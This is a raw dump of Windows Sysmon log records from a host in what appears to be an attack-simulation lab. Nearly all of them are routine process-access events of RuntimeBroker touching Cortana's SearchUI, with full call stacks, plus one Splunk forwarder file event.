12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.423{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011037Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011036Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011035Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011034Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011033Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011032Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011031Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.313{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011030Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.235{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDEE37574F63380EAD76406CD6700F54,SHA256=0453B72DBBBE31B8D29D590C872DC1C99530065CD31AC85C5B39F317FA672C9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011029Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011028Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011027Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011026Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011025Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011024Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011023Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.126{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011022Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
